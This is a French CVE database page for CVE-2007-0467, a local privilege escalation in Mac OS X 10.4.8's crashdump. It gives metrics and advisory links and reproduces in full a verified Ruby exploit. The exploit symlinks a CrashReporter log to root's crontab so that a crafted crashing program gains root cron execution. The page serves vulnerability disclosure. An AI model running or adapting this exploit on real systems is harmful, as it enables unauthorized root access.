CVE-2007-0467 : Détail

CVE-2007-0467

0.12%V4
Local
2007-01-31
01h00 +00:00
2017-07-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

crashdump in Apple Mac OS X 10.4.8 allows local users in the admin group to modify arbitrary files or gain privileges via a symlink attack on application logs in /Library/Logs/CrashReporter/.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.2 AV:L/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3219

Date de publication : 2007-01-28 23h00 +00:00
Auteur : MoAB
EDB Vérifié : Yes

#!/usr/bin/ruby # Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com> # Lance M. Havok <lmh [at] info-pull.com> # All pwnage reserved. # # 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter # 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log # 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output # # 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT.. # 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 .....@.......0.. # 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ............... # 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................ # 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld... # 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45 ....4.......h..E # 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20 ..X.......* * * # 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c * * /tmp/x...dyl # 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000 ib...........0.. # # 4) Run the fake program which will crash and create /var/cron/tabs/root # 5) Sleep and then create a legit crontab to refresh cron SYMLINK_PATH = "/Library/Logs/CrashReporter/vuln.crash.log" PWNERCYCLE = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};" + "chmod 000 ~/Library/Logs/CrashReporter/;" + "crontab /tmp/fakecron;" + "chmod +x /Users/Shared/r00t; sleep 61; ./vuln;" def escalate() puts "++ Fixing up a fake crontab" fakecron = File.new("/tmp/fakecron", "w") fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n") fakecron.close tmp_ex = File.new("/Users/Shared/r00t", "w") tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n") tmp_ex.close system PWNERCYCLE end escalate() # milw0rm.com [2007-01-29]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.8

Références

http://www.us-cert.gov/cas/techalerts/TA07-072A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securitytracker.com/id?1017751
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0930
Tags : vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/32706
Tags : vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/363112
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/24479
Tags : third-party-advisory, x_refsource_SECUNIA